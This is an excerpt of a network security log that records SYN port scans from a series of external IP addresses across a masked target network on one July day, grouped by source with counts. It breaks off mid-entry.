128.148.60.132:4841 -> xxx.yyy.255.253:1433 SYN ******S* 71597 Jul 6 16:02:02 140.135.97.159:3600 -> xxx.yyy.1.1:21 SYN ******S* Jul 6 16:02:02 140.135.97.159:3601 -> xxx.yyy.1.2:21 SYN ******S* Jul 6 16:02:02 140.135.97.159:3602 -> xxx.yyy.1.3:21 SYN ******S* Jul 6 16:02:02 140.135.97.159:3603 -> xxx.yyy.1.4:21 SYN ******S* Jul 6 16:02:02 140.135.97.159:3604 -> xxx.yyy.1.5:21 SYN ******S* Jul 6 16:02:02 140.135.97.159:3605 -> xxx.yyy.1.6:21 SYN ******S* Jul 6 16:02:02 140.135.97.159:3607 -> xxx.yyy.1.8:21 SYN ******S* Jul 6 16:02:02 140.135.97.159:3608 -> xxx.yyy.1.9:21 SYN ******S* [...] Jul 6 16:13:06 140.135.97.159:2520 -> xxx.yyy.255.246:21 SYN ******S* Jul 6 16:13:06 140.135.97.159:2517 -> xxx.yyy.255.243:21 SYN ******S* Jul 6 16:13:06 140.135.97.159:2514 -> xxx.yyy.255.240:21 SYN ******S* Jul 6 16:13:06 140.135.97.159:2524 -> xxx.yyy.255.250:21 SYN ******S* Jul 6 16:13:06 140.135.97.159:2525 -> xxx.yyy.255.251:21 SYN ******S* Jul 6 16:13:06 140.135.97.159:2526 -> xxx.yyy.255.252:21 SYN ******S* Jul 6 16:13:06 140.135.97.159:2528 -> xxx.yyy.255.254:21 SYN ******S* Jul 6 16:13:06 140.135.97.159:2527 -> xxx.yyy.255.253:21 SYN ******S* 71571 Jul 6 01:53:17 212.241.147.146:36284 -> xxx.yyy.1.1:8000 SYN ******S* Jul 6 01:53:17 212.241.147.146:36285 -> xxx.yyy.1.2:8000 SYN ******S* Jul 6 01:53:17 212.241.147.146:36286 -> xxx.yyy.1.3:8000 SYN ******S* Jul 6 01:53:18 212.241.147.146:36287 -> xxx.yyy.1.4:8000 SYN ******S* Jul 6 01:53:18 212.241.147.146:36289 -> xxx.yyy.1.5:8000 SYN ******S* Jul 6 01:53:18 212.241.147.146:36290 -> xxx.yyy.1.6:8000 SYN ******S* Jul 6 01:53:18 212.241.147.146:36291 -> xxx.yyy.1.7:8000 SYN ******S* Jul 6 01:53:18 212.241.147.146:36292 -> xxx.yyy.1.8:8000 SYN ******S* [...] Jul 6 02:05:21 212.241.147.146:39477 -> xxx.yyy.255.246:8000 SYN ******S* Jul 6 02:05:21 212.241.147.146:39478 -> xxx.yyy.255.247:8000 SYN ******S* Jul 6 02:05:21 212.241.147.146:39479 -> xxx.yyy.255.248:8000 SYN ******S* Jul 6 02:05:21 212.241.147.146:39480 -> xxx.yyy.255.249:8000 SYN ******S* Jul 6 02:05:21 212.241.147.146:39481 -> xxx.yyy.255.250:8000 SYN ******S* Jul 6 02:05:22 212.241.147.146:39483 -> xxx.yyy.255.252:8000 SYN ******S* Jul 6 02:05:22 212.241.147.146:39484 -> xxx.yyy.255.253:8000 SYN ******S* Jul 6 02:05:22 212.241.147.146:39485 -> xxx.yyy.255.254:8000 SYN ******S* 71434 Jul 6 22:35:56 132.248.107.253:4693 -> xxx.yyy.1.1:1433 SYN ******S* Jul 6 22:35:56 132.248.107.253:4703 -> xxx.yyy.1.2:1433 SYN ******S* Jul 6 22:35:56 132.248.107.253:4712 -> xxx.yyy.1.3:1433 SYN ******S* Jul 6 22:35:56 132.248.107.253:4724 -> xxx.yyy.1.4:1433 SYN ******S* Jul 6 22:35:56 132.248.107.253:4733 -> xxx.yyy.1.5:1433 SYN ******S* Jul 6 22:35:56 132.248.107.253:4743 -> xxx.yyy.1.6:1433 SYN ******S* Jul 6 22:35:53 132.248.107.253:4758 -> xxx.yyy.1.7:1433 SYN ******S* Jul 6 22:35:53 132.248.107.253:4766 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 6 22:47:41 132.248.107.253:3568 -> xxx.yyy.255.241:1433 SYN ******S* Jul 6 22:47:41 132.248.107.253:3585 -> xxx.yyy.255.243:1433 SYN ******S* Jul 6 22:47:41 132.248.107.253:3610 -> xxx.yyy.255.245:1433 SYN ******S* Jul 6 22:47:41 132.248.107.253:3558 -> xxx.yyy.255.240:1433 SYN ******S* Jul 6 22:47:41 132.248.107.253:3678 -> xxx.yyy.255.253:1433 SYN ******S* Jul 6 22:47:41 132.248.107.253:3666 -> xxx.yyy.255.252:1433 SYN ******S* Jul 6 22:47:41 132.248.107.253:3646 -> xxx.yyy.255.250:1433 SYN ******S* Jul 6 22:47:41 132.248.107.253:3658 -> xxx.yyy.255.251:1433 SYN ******S* Jul 6 22:47:41 132.248.107.253:3681 -> xxx.yyy.255.254:1433 SYN ******S* 71292 Jul 6 21:06:14 194.29.5.236:4178 -> xxx.yyy.1.1:1433 SYN ******S* Jul 6 21:06:14 194.29.5.236:4179 -> xxx.yyy.1.2:1433 SYN ******S* Jul 6 21:06:14 194.29.5.236:4180 -> xxx.yyy.1.3:1433 SYN ******S* Jul 6 21:06:14 194.29.5.236:4181 -> xxx.yyy.1.4:1433 SYN ******S* Jul 6 21:06:11 194.29.5.236:4182 -> xxx.yyy.1.5:1433 SYN ******S* Jul 6 21:06:11 194.29.5.236:4183 -> xxx.yyy.1.6:1433 SYN ******S* Jul 6 21:06:14 194.29.5.236:4184 -> xxx.yyy.1.7:1433 SYN ******S* Jul 6 21:06:14 194.29.5.236:4185 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 6 21:17:52 194.29.5.236:2949 -> xxx.yyy.255.249:1433 SYN ******S* Jul 6 21:17:52 194.29.5.236:2948 -> xxx.yyy.255.248:1433 SYN ******S* Jul 6 21:17:52 194.29.5.236:2946 -> xxx.yyy.255.246:1433 SYN ******S* Jul 6 21:17:52 194.29.5.236:2945 -> xxx.yyy.255.245:1433 SYN ******S* Jul 6 21:17:52 194.29.5.236:2950 -> xxx.yyy.255.250:1433 SYN ******S* Jul 6 21:17:52 194.29.5.236:2947 -> xxx.yyy.255.247:1433 SYN ******S* Jul 6 21:17:52 194.29.5.236:2954 -> xxx.yyy.255.254:1433 SYN ******S* Jul 6 21:17:52 194.29.5.236:2953 -> xxx.yyy.255.253:1433 SYN ******S* 70466 Jul 6 09:02:32 128.138.147.135:4109 -> xxx.yyy.1.1:8000 SYN ******S* Jul 6 09:02:32 128.138.147.135:4122 -> xxx.yyy.1.2:8000 SYN ******S* Jul 6 09:02:32 128.138.147.135:4125 -> xxx.yyy.1.3:8000 SYN ******S* Jul 6 09:02:34 128.138.147.135:4126 -> xxx.yyy.1.4:8000 SYN ******S* Jul 6 09:02:34 128.138.147.135:4127 -> xxx.yyy.1.5:8000 SYN ******S* Jul 6 09:02:34 128.138.147.135:4132 -> xxx.yyy.1.6:8000 SYN ******S* Jul 6 09:02:34 128.138.147.135:4133 -> xxx.yyy.1.7:8000 SYN ******S* Jul 6 09:02:34 128.138.147.135:4135 -> xxx.yyy.1.8:8000 SYN ******S* [...] Jul 6 09:11:17 128.138.147.135:2642 -> xxx.yyy.zzz.241:8000 SYN ******S* Jul 6 09:11:17 128.138.147.135:2655 -> xxx.yyy.zzz.254:8000 SYN ******S* Jul 6 09:11:17 128.138.147.135:2639 -> xxx.yyy.zzz.238:8000 SYN ******S* Jul 6 09:11:17 128.138.147.135:2646 -> xxx.yyy.zzz.245:8000 SYN ******S* Jul 6 09:11:17 128.138.147.135:2630 -> xxx.yyy.zzz.229:8000 SYN ******S* Jul 6 09:11:17 128.138.147.135:2643 -> xxx.yyy.zzz.242:8000 SYN ******S* Jul 6 09:11:17 128.138.147.135:2640 -> xxx.yyy.zzz.239:8000 SYN ******S* Jul 6 09:11:17 128.138.147.135:2653 -> xxx.yyy.zzz.252:8000 SYN ******S* Jul 6 09:11:17 128.138.147.135:2637 -> xxx.yyy.zzz.236:8000 SYN ******S* 67470 Jul 6 00:00:04 64.231.162.117:1117 -> xxx.yyy.184.32:139 SYN ******S* Jul 6 00:00:01 64.231.162.117:1046 -> xxx.yyy.183.217:139 SYN ******S* Jul 6 00:00:01 64.231.162.117:1087 -> xxx.yyy.184.2:139 SYN ******S* Jul 6 00:00:03 64.231.162.117:1137 -> xxx.yyy.184.52:139 SYN ******S* Jul 6 00:00:03 64.231.162.117:1107 -> xxx.yyy.184.22:139 SYN ******S* Jul 6 00:00:03 64.231.162.117:1108 -> xxx.yyy.184.23:139 SYN ******S* Jul 6 00:00:03 64.231.162.117:1138 -> xxx.yyy.184.53:139 SYN ******S* Jul 6 00:00:03 64.231.162.117:1109 -> xxx.yyy.184.24:139 SYN ******S* [...] Jul 6 01:10:36 64.231.162.117:2928 -> xxx.yyy.255.246:139 SYN ******S* Jul 6 01:10:36 64.231.162.117:2929 -> xxx.yyy.255.247:139 SYN ******S* Jul 6 01:10:36 64.231.162.117:2930 -> xxx.yyy.255.248:139 SYN ******S* Jul 6 01:10:36 64.231.162.117:2931 -> xxx.yyy.255.249:139 SYN ******S* Jul 6 01:10:36 64.231.162.117:2932 -> xxx.yyy.255.250:139 SYN ******S* Jul 6 01:10:37 64.231.162.117:2933 -> xxx.yyy.255.251:139 SYN ******S* Jul 6 01:10:37 64.231.162.117:2934 -> xxx.yyy.255.252:139 SYN ******S* Jul 6 01:10:37 64.231.162.117:2935 -> xxx.yyy.255.253:139 SYN ******S* Jul 6 01:10:37 64.231.162.117:2936 -> xxx.yyy.255.254:139 SYN ******S* 51066 Jul 6 14:37:37 216.67.231.152:53168 -> xxx.yyy.1.0:443 SYN ******S* Jul 6 14:37:37 216.67.231.152:53170 -> xxx.yyy.1.2:443 SYN ******S* Jul 6 14:37:37 216.67.231.152:53169 -> xxx.yyy.1.1:443 SYN ******S* Jul 6 14:37:40 216.67.231.152:53176 -> xxx.yyy.1.8:443 SYN ******S* Jul 6 14:37:40 216.67.231.152:53180 -> xxx.yyy.1.12:443 SYN ******S* Jul 6 14:37:37 216.67.231.152:53314 -> xxx.yyy.1.13:443 SYN ******S* Jul 6 14:37:37 216.67.231.152:53171 -> xxx.yyy.1.3:443 SYN ******S* Jul 6 14:37:40 216.67.231.152:53389 -> xxx.yyy.1.15:443 SYN ******S* [...] Jul 6 15:11:00 216.67.231.152:54192 -> xxx.yyy.201.28:443 SYN ******S* Jul 6 15:11:00 216.67.231.152:54194 -> xxx.yyy.201.30:443 SYN ******S* Jul 6 15:11:00 216.67.231.152:54195 -> xxx.yyy.201.31:443 SYN ******S* Jul 6 15:11:00 216.67.231.152:54200 -> xxx.yyy.201.36:443 SYN ******S* Jul 6 15:11:00 216.67.231.152:54202 -> xxx.yyy.201.38:443 SYN ******S* Jul 6 15:11:00 216.67.231.152:54205 -> xxx.yyy.201.41:443 SYN ******S* Jul 6 15:11:00 216.67.231.152:54203 -> xxx.yyy.201.39:443 SYN ******S* Jul 6 15:11:00 216.67.231.152:54206 -> xxx.yyy.201.42:443 SYN ******S* Jul 6 15:11:00 216.67.231.152:54207 -> xxx.yyy.201.43:443 SYN ******S* 49546 Jul 6 00:00:06 64.30.172.24:4224 -> xxx.yyy.152.101:715 SYN ******S* Jul 6 00:00:06 64.30.172.24:4225 -> xxx.yyy.152.102:715 SYN ******S* Jul 6 00:00:06 64.30.172.24:4226 -> xxx.yyy.152.103:715 SYN ******S* Jul 6 00:00:06 64.30.172.24:4232 -> xxx.yyy.152.106:715 SYN ******S* Jul 6 00:00:06 64.30.172.24:4227 -> xxx.yyy.152.107:715 SYN ******S* Jul 6 00:00:03 64.30.172.24:4024 -> xxx.yyy.151.183:715 SYN ******S* Jul 6 00:00:03 64.30.172.24:4021 -> xxx.yyy.151.180:715 SYN ******S* Jul 6 00:00:06 64.30.172.24:4228 -> xxx.yyy.152.104:715 SYN ******S* [...] Jul 6 00:07:33 64.30.172.24:4176 -> xxx.yyy.255.245:715 SYN ******S* Jul 6 00:07:33 64.30.172.24:4177 -> xxx.yyy.255.246:715 SYN ******S* Jul 6 00:07:33 64.30.172.24:4180 -> xxx.yyy.255.249:715 SYN ******S* Jul 6 00:07:33 64.30.172.24:4174 -> xxx.yyy.255.243:715 SYN ******S* Jul 6 00:07:33 64.30.172.24:4182 -> xxx.yyy.255.251:715 SYN ******S* Jul 6 00:07:33 64.30.172.24:4181 -> xxx.yyy.255.250:715 SYN ******S* Jul 6 00:07:33 64.30.172.24:4185 -> xxx.yyy.255.254:715 SYN ******S* Jul 6 00:07:33 64.30.172.24:4184 -> xxx.yyy.255.253:715 SYN ******S* Jul 6 00:07:33 64.30.172.24:4183 -> xxx.yyy.255.252:715 SYN ******S* 44809 Jul 6 21:53:27 158.39.26.238:20515 -> xxx.yyy.1.43:139 SYN ******S* Jul 6 21:53:27 158.39.26.238:20514 -> xxx.yyy.1.42:139 SYN ******S* Jul 6 21:53:27 158.39.26.238:20509 -> xxx.yyy.1.37:139 SYN ******S* Jul 6 21:53:27 158.39.26.238:20508 -> xxx.yyy.1.36:139 SYN ******S* Jul 6 21:53:27 158.39.26.238:20502 -> xxx.yyy.1.30:139 SYN ******S* Jul 6 21:53:27 158.39.26.238:20501 -> xxx.yyy.1.29:139 SYN ******S* Jul 6 21:53:27 158.39.26.238:20500 -> xxx.yyy.1.28:139 SYN ******S* Jul 6 21:53:27 158.39.26.238:20498 -> xxx.yyy.1.26:139 SYN ******S* [...] Jul 6 21:56:36 158.39.26.238:10283 -> xxx.yyy.254.186:139 SYN ******S* Jul 6 21:56:36 158.39.26.238:10284 -> xxx.yyy.254.187:139 SYN ******S* Jul 6 21:56:36 158.39.26.238:10285 -> xxx.yyy.254.188:139 SYN ******S* Jul 6 21:56:36 158.39.26.238:10287 -> xxx.yyy.254.190:139 SYN ******S* Jul 6 21:56:36 158.39.26.238:10568 -> xxx.yyy.255.177:139 SYN ******S* Jul 6 21:56:36 158.39.26.238:10302 -> xxx.yyy.254.205:139 SYN ******S* Jul 6 21:56:36 158.39.26.238:10529 -> xxx.yyy.255.222:139 SYN ******S* Jul 6 21:56:36 158.39.26.238:10275 -> xxx.yyy.254.178:139 SYN ******S* Jul 6 21:56:36 158.39.26.238:10286 -> xxx.yyy.254.189:139 SYN ******S* 43056 Jul 6 04:39:48 61.11.3.109:47529 -> xxx.yyy.1.0:21 SYN ******S* Jul 6 04:39:48 61.11.3.109:47530 -> xxx.yyy.1.1:21 SYN ******S* Jul 6 04:39:48 61.11.3.109:47531 -> xxx.yyy.1.2:21 SYN ******S* Jul 6 04:39:48 61.11.3.109:47533 -> xxx.yyy.1.4:21 SYN ******S* Jul 6 04:39:48 61.11.3.109:47563 -> xxx.yyy.1.34:21 SYN ******S* Jul 6 04:39:48 61.11.3.109:47574 -> xxx.yyy.1.44:21 SYN ******S* Jul 6 04:39:48 61.11.3.109:47532 -> xxx.yyy.1.3:21 SYN ******S* Jul 6 04:39:48 61.11.3.109:47585 -> xxx.yyy.1.55:21 SYN ******S* [...] Jul 6 04:50:41 61.11.3.109:50750 -> xxx.yyy.255.247:21 SYN ******S* Jul 6 04:50:41 61.11.3.109:50752 -> xxx.yyy.255.249:21 SYN ******S* Jul 6 04:50:41 61.11.3.109:50753 -> xxx.yyy.255.250:21 SYN ******S* Jul 6 04:50:41 61.11.3.109:50754 -> xxx.yyy.255.251:21 SYN ******S* Jul 6 04:50:41 61.11.3.109:50758 -> xxx.yyy.255.255:21 SYN ******S* Jul 6 04:50:41 61.11.3.109:50755 -> xxx.yyy.255.252:21 SYN ******S* Jul 6 04:50:41 61.11.3.109:50756 -> xxx.yyy.255.253:21 SYN ******S* Jul 6 04:50:41 61.11.3.109:50757 -> xxx.yyy.255.254:21 SYN ******S* 28157 Jul 6 07:54:24 24.37.175.52:41505 -> xxx.yyy.1.0:2401 SYN ******S* Jul 6 07:54:21 24.37.175.52:41507 -> xxx.yyy.1.2:2401 SYN ******S* Jul 6 07:54:21 24.37.175.52:41508 -> xxx.yyy.1.3:2401 SYN ******S* Jul 6 07:54:21 24.37.175.52:41506 -> xxx.yyy.1.1:2401 SYN ******S* Jul 6 07:54:24 24.37.175.52:41509 -> xxx.yyy.1.4:2401 SYN ******S* Jul 6 07:54:24 24.37.175.52:41510 -> xxx.yyy.1.5:2401 SYN ******S* Jul 6 07:54:24 24.37.175.52:41513 -> xxx.yyy.1.8:2401 SYN ******S* Jul 6 07:54:24 24.37.175.52:41515 -> xxx.yyy.1.10:2401 SYN ******S* [...] Jul 6 08:02:58 24.37.175.52:49973 -> xxx.yyy.255.163:2401 SYN ******S* Jul 6 08:02:58 24.37.175.52:49975 -> xxx.yyy.255.165:2401 SYN ******S* Jul 6 08:02:58 24.37.175.52:49974 -> xxx.yyy.255.164:2401 SYN ******S* Jul 6 08:02:58 24.37.175.52:49976 -> xxx.yyy.255.166:2401 SYN ******S* Jul 6 08:02:58 24.37.175.52:49977 -> xxx.yyy.255.167:2401 SYN ******S* Jul 6 08:02:58 24.37.175.52:49979 -> xxx.yyy.255.169:2401 SYN ******S* Jul 6 08:02:58 24.37.175.52:49981 -> xxx.yyy.255.171:2401 SYN ******S* Jul 6 08:02:58 24.37.175.52:49980 -> xxx.yyy.255.170:2401 SYN ******S* Jul 6 08:02:58 24.37.175.52:49978 -> xxx.yyy.255.168:2401 SYN ******S* 23684 Jul 6 00:57:46 218.24.193.140:3547 -> xxx.yyy.194.125:5554 SYN ******S* Jul 6 00:57:49 218.24.193.140:4351 -> xxx.yyy.194.125:1023 SYN ******S* Jul 6 00:57:46 218.24.193.140:3550 -> xxx.yyy.194.126:5554 SYN ******S* Jul 6 00:57:49 218.24.193.140:4353 -> xxx.yyy.194.126:1023 SYN ******S* Jul 6 00:57:46 218.24.193.140:3553 -> xxx.yyy.194.124:5554 SYN ******S* Jul 6 00:57:49 218.24.193.140:4356 -> xxx.yyy.194.124:1023 SYN ******S* Jul 6 00:57:46 218.24.193.140:3554 -> xxx.yyy.194.127:5554 SYN ******S* Jul 6 00:57:49 218.24.193.140:4369 -> xxx.yyy.194.127:1023 SYN ******S* [...] Jul 6 01:00:33 218.24.193.140:1097 -> xxx.yyy.214.225:9898 SYN ******S* Jul 6 01:00:33 218.24.193.140:1095 -> xxx.yyy.214.224:9898 SYN ******S* Jul 6 01:00:33 218.24.193.140:1100 -> xxx.yyy.214.244:9898 SYN ******S* Jul 6 01:00:33 218.24.193.140:1101 -> xxx.yyy.214.239:9898 SYN ******S* Jul 6 01:00:33 218.24.193.140:1099 -> xxx.yyy.214.229:9898 SYN ******S* Jul 6 01:00:33 218.24.193.140:1106 -> xxx.yyy.214.243:9898 SYN ******S* Jul 6 01:00:33 218.24.193.140:1110 -> xxx.yyy.214.234:9898 SYN ******S* Jul 6 01:00:33 218.24.193.140:1130 -> xxx.yyy.214.245:9898 SYN ******S* 15020 Jul 6 16:32:47 218.25.71.52:3021 -> xxx.yyy.71.160:5554 SYN ******S* Jul 6 16:32:48 218.25.71.52:3671 -> xxx.yyy.71.160:1023 SYN ******S* Jul 6 16:32:50 218.25.71.52:1447 -> xxx.yyy.71.160:9898 SYN ******S* Jul 6 16:32:47 218.25.71.52:3024 -> xxx.yyy.71.162:5554 SYN ******S* Jul 6 16:32:48 218.25.71.52:3676 -> xxx.yyy.71.162:1023 SYN ******S* Jul 6 16:32:50 218.25.71.52:1467 -> xxx.yyy.71.162:9898 SYN ******S* Jul 6 16:32:47 218.25.71.52:3025 -> xxx.yyy.71.163:5554 SYN ******S* Jul 6 16:32:48 218.25.71.52:3679 -> xxx.yyy.71.163:1023 SYN ******S* [...] Jul 6 16:33:29 218.25.71.52:3591 -> xxx.yyy.91.247:9898 SYN ******S* Jul 6 16:33:29 218.25.71.52:3594 -> xxx.yyy.91.250:9898 SYN ******S* Jul 6 16:33:29 218.25.71.52:3595 -> xxx.yyy.91.251:9898 SYN ******S* Jul 6 16:33:29 218.25.71.52:3596 -> xxx.yyy.91.252:9898 SYN ******S* Jul 6 16:33:29 218.25.71.52:3593 -> xxx.yyy.91.249:9898 SYN ******S* Jul 6 16:33:29 218.25.71.52:3597 -> xxx.yyy.91.253:9898 SYN ******S* Jul 6 16:33:29 218.25.71.52:3602 -> xxx.yyy.91.254:9898 SYN ******S* Jul 6 16:33:29 218.25.71.52:3619 -> xxx.yyy.92.3:9898 SYN ******S* Jul 6 16:33:29 218.25.71.52:3620 -> xxx.yyy.92.4:9898 SYN ******S* 14521 Jul 6 00:44:01 221.216.28.201:1118 -> xxx.yyy.72.124:5554 SYN ******S* Jul 6 00:44:02 221.216.28.201:1570 -> xxx.yyy.72.124:1023 SYN ******S* Jul 6 00:44:04 221.216.28.201:2662 -> xxx.yyy.72.124:9898 SYN ******S* Jul 6 00:44:01 221.216.28.201:1128 -> xxx.yyy.72.125:5554 SYN ******S* Jul 6 00:44:02 221.216.28.201:1594 -> xxx.yyy.72.125:1023 SYN ******S* Jul 6 00:44:04 221.216.28.201:2794 -> xxx.yyy.72.125:9898 SYN ******S* Jul 6 00:44:01 221.216.28.201:1202 -> xxx.yyy.72.126:5554 SYN ******S* Jul 6 00:44:02 221.216.28.201:1664 -> xxx.yyy.72.126:1023 SYN ******S* [...] Jul 6 00:44:45 221.216.28.201:2409 -> xxx.yyy.92.237:9898 SYN ******S* Jul 6 00:44:45 221.216.28.201:2411 -> xxx.yyy.92.242:9898 SYN ******S* Jul 6 00:44:45 221.216.28.201:2412 -> xxx.yyy.92.243:9898 SYN ******S* Jul 6 00:44:45 221.216.28.201:2414 -> xxx.yyy.92.245:9898 SYN ******S* Jul 6 00:44:45 221.216.28.201:2413 -> xxx.yyy.92.244:9898 SYN ******S* Jul 6 00:44:45 221.216.28.201:2417 -> xxx.yyy.92.240:9898 SYN ******S* Jul 6 00:44:45 221.216.28.201:2418 -> xxx.yyy.92.241:9898 SYN ******S* Jul 6 00:44:45 221.216.28.201:2416 -> xxx.yyy.92.239:9898 SYN ******S* Jul 6 00:44:45 221.216.28.201:2423 -> xxx.yyy.92.246:9898 SYN ******S* 14390 Jul 6 00:59:26 221.216.30.234:1025 -> xxx.yyy.153.137:5554 SYN ******S* Jul 6 00:59:27 221.216.30.234:1025 -> xxx.yyy.153.137:1023 SYN ******S* Jul 6 00:59:29 221.216.30.234:1495 -> xxx.yyy.153.137:9898 SYN ******S* Jul 6 00:59:26 221.216.30.234:1025 -> xxx.yyy.153.136:5554 SYN ******S* Jul 6 00:59:27 221.216.30.234:1025 -> xxx.yyy.153.136:1023 SYN ******S* Jul 6 00:59:29 221.216.30.234:1494 -> xxx.yyy.153.136:9898 SYN ******S* Jul 6 00:59:26 221.216.30.234:1025 -> xxx.yyy.153.138:5554 SYN ******S* Jul 6 00:59:27 221.216.30.234:1025 -> xxx.yyy.153.138:1023 SYN ******S* [...] Jul 6 01:00:15 221.216.30.234:2979 -> xxx.yyy.173.255:9898 SYN ******S* Jul 6 01:00:15 221.216.30.234:2982 -> xxx.yyy.174.2:9898 SYN ******S* Jul 6 01:00:15 221.216.30.234:2970 -> xxx.yyy.173.245:9898 SYN ******S* Jul 6 01:00:15 221.216.30.234:2971 -> xxx.yyy.173.246:9898 SYN ******S* Jul 6 01:00:15 221.216.30.234:2973 -> xxx.yyy.173.248:9898 SYN ******S* Jul 6 01:00:15 221.216.30.234:2976 -> xxx.yyy.173.252:9898 SYN ******S* Jul 6 01:00:15 221.216.30.234:2975 -> xxx.yyy.173.251:9898 SYN ******S* Jul 6 01:00:15 221.216.30.234:2978 -> xxx.yyy.173.254:9898 SYN ******S* 13910 Jul 6 00:56:51 218.25.229.42:3865 -> xxx.yyy.71.164:5554 SYN ******S* Jul 6 00:56:54 218.25.229.42:4501 -> xxx.yyy.71.164:9898 SYN ******S* Jul 6 00:56:51 218.25.229.42:3868 -> xxx.yyy.71.161:5554 SYN ******S* Jul 6 00:56:54 218.25.229.42:4502 -> xxx.yyy.71.161:9898 SYN ******S* Jul 6 00:56:51 218.25.229.42:3870 -> xxx.yyy.71.167:5554 SYN ******S* Jul 6 00:56:51 218.25.229.42:3876 -> xxx.yyy.71.173:5554 SYN ******S* Jul 6 00:56:54 218.25.229.42:4513 -> xxx.yyy.71.173:9898 SYN ******S* Jul 6 00:56:51 218.25.229.42:3864 -> xxx.yyy.71.166:5554 SYN ******S* [...] Jul 6 00:58:27 218.25.229.42:2714 -> xxx.yyy.92.18:9898 SYN ******S* Jul 6 00:58:27 218.25.229.42:2715 -> xxx.yyy.92.19:9898 SYN ******S* Jul 6 00:58:27 218.25.229.42:2717 -> xxx.yyy.92.21:9898 SYN ******S* Jul 6 00:58:27 218.25.229.42:2716 -> xxx.yyy.92.20:9898 SYN ******S* Jul 6 00:58:27 218.25.229.42:2718 -> xxx.yyy.92.22:9898 SYN ******S* Jul 6 00:58:27 218.25.229.42:2719 -> xxx.yyy.92.23:9898 SYN ******S* Jul 6 00:58:27 218.25.229.42:2720 -> xxx.yyy.92.24:9898 SYN ******S* Jul 6 00:58:27 218.25.229.42:2724 -> xxx.yyy.92.25:9898 SYN ******S* Jul 6 00:58:27 218.25.229.42:2779 -> xxx.yyy.92.26:9898 SYN ******S* 13648 Jul 6 00:56:13 218.24.172.209:4404 -> xxx.yyy.214.246:5554 SYN ******S* Jul 6 00:56:14 218.24.172.209:1269 -> xxx.yyy.214.246:1023 SYN ******S* Jul 6 00:56:16 218.24.172.209:2471 -> xxx.yyy.214.246:9898 SYN ******S* Jul 6 00:56:13 218.24.172.209:4414 -> xxx.yyy.214.247:5554 SYN ******S* Jul 6 00:56:14 218.24.172.209:1272 -> xxx.yyy.214.247:1023 SYN ******S* Jul 6 00:56:16 218.24.172.209:2476 -> xxx.yyy.214.247:9898 SYN ******S* Jul 6 00:56:13 218.24.172.209:4421 -> xxx.yyy.214.248:5554 SYN ******S* Jul 6 00:56:14 218.24.172.209:1274 -> xxx.yyy.214.248:1023 SYN ******S* [...] Jul 6 00:56:54 218.24.172.209:3957 -> xxx.yyy.235.100:9898 SYN ******S* Jul 6 00:56:54 218.24.172.209:3955 -> xxx.yyy.235.99:9898 SYN ******S* Jul 6 00:56:54 218.24.172.209:3958 -> xxx.yyy.235.101:9898 SYN ******S* Jul 6 00:56:54 218.24.172.209:3964 -> xxx.yyy.235.102:9898 SYN ******S* Jul 6 00:56:54 218.24.172.209:3966 -> xxx.yyy.235.103:9898 SYN ******S* Jul 6 00:56:54 218.24.172.209:3967 -> xxx.yyy.235.104:9898 SYN ******S* Jul 6 00:56:54 218.24.172.209:3974 -> xxx.yyy.235.105:9898 SYN ******S* Jul 6 00:56:54 218.24.172.209:3975 -> xxx.yyy.235.106:9898 SYN ******S* 12853 Jul 6 00:57:50 218.24.86.238:3212 -> xxx.yyy.72.127:5554 SYN ******S* Jul 6 00:57:51 218.24.86.238:4372 -> xxx.yyy.72.127:1023 SYN ******S* Jul 6 00:57:50 218.24.86.238:3219 -> xxx.yyy.72.128:5554 SYN ******S* Jul 6 00:57:51 218.24.86.238:4375 -> xxx.yyy.72.128:1023 SYN ******S* Jul 6 00:57:50 218.24.86.238:3224 -> xxx.yyy.72.131:5554 SYN ******S* Jul 6 00:57:51 218.24.86.238:4378 -> xxx.yyy.72.131:1023 SYN ******S* Jul 6 00:57:50 218.24.86.238:3228 -> xxx.yyy.72.135:5554 SYN ******S* Jul 6 00:57:51 218.24.86.238:4409 -> xxx.yyy.72.135:1023 SYN ******S* [...] Jul 6 00:58:31 218.24.86.238:1219 -> xxx.yyy.92.235:9898 SYN ******S* Jul 6 00:58:31 218.24.86.238:1220 -> xxx.yyy.92.236:9898 SYN ******S* Jul 6 00:58:31 218.24.86.238:1227 -> xxx.yyy.92.243:9898 SYN ******S* Jul 6 00:58:31 218.24.86.238:1236 -> xxx.yyy.92.240:9898 SYN ******S* Jul 6 00:58:31 218.24.86.238:1237 -> xxx.yyy.92.241:9898 SYN ******S* Jul 6 00:58:31 218.24.86.238:1238 -> xxx.yyy.92.242:9898 SYN ******S* Jul 6 00:58:31 218.24.86.238:1239 -> xxx.yyy.92.246:9898 SYN ******S* Jul 6 00:58:31 218.24.86.238:1240 -> xxx.yyy.92.239:9898 SYN ******S* 11882 [...] 6569 Jul 6 00:56:12 221.216.32.111:4816 -> xxx.yyy.72.124:5554 SYN ******S* Jul 6 00:56:13 221.216.32.111:1704 -> xxx.yyy.72.124:1023 SYN ******S* Jul 6 00:56:15 221.216.32.111:3175 -> xxx.yyy.72.124:9898 SYN ******S* Jul 6 00:56:12 221.216.32.111:4817 -> xxx.yyy.72.128:5554 SYN ******S* Jul 6 00:56:13 221.216.32.111:1705 -> xxx.yyy.72.128:1023 SYN ******S* Jul 6 00:56:15 221.216.32.111:3176 -> xxx.yyy.72.128:9898 SYN ******S* Jul 6 00:56:12 221.216.32.111:4838 -> xxx.yyy.72.136:5554 SYN ******S* Jul 6 00:56:12 221.216.32.111:4818 -> xxx.yyy.72.129:5554 SYN ******S* [...] Jul 6 00:56:53 221.216.32.111:1870 -> xxx.yyy.92.145:9898 SYN ******S* Jul 6 00:56:54 221.216.32.111:1948 -> xxx.yyy.92.160:9898 SYN ******S* Jul 6 00:56:54 221.216.32.111:1956 -> xxx.yyy.92.161:9898 SYN ******S* Jul 6 00:56:54 221.216.32.111:1975 -> xxx.yyy.92.163:9898 SYN ******S* Jul 6 00:56:54 221.216.32.111:1978 -> xxx.yyy.92.165:9898 SYN ******S* Jul 6 00:56:54 221.216.32.111:1977 -> xxx.yyy.92.164:9898 SYN ******S* Jul 6 00:56:54 221.216.32.111:2260 -> xxx.yyy.92.202:9898 SYN ******S* Jul 6 00:56:54 221.216.32.111:2307 -> xxx.yyy.92.238:9898 SYN ******S* Jul 6 00:56:54 221.216.32.111:2314 -> xxx.yyy.92.244:9898 SYN ******S* 5953 Jul 6 00:56:44 218.65.245.92:2488 -> xxx.yyy.215.237:5554 SYN ******S* Jul 6 00:56:46 218.65.245.92:2966 -> xxx.yyy.215.237:1023 SYN ******S* Jul 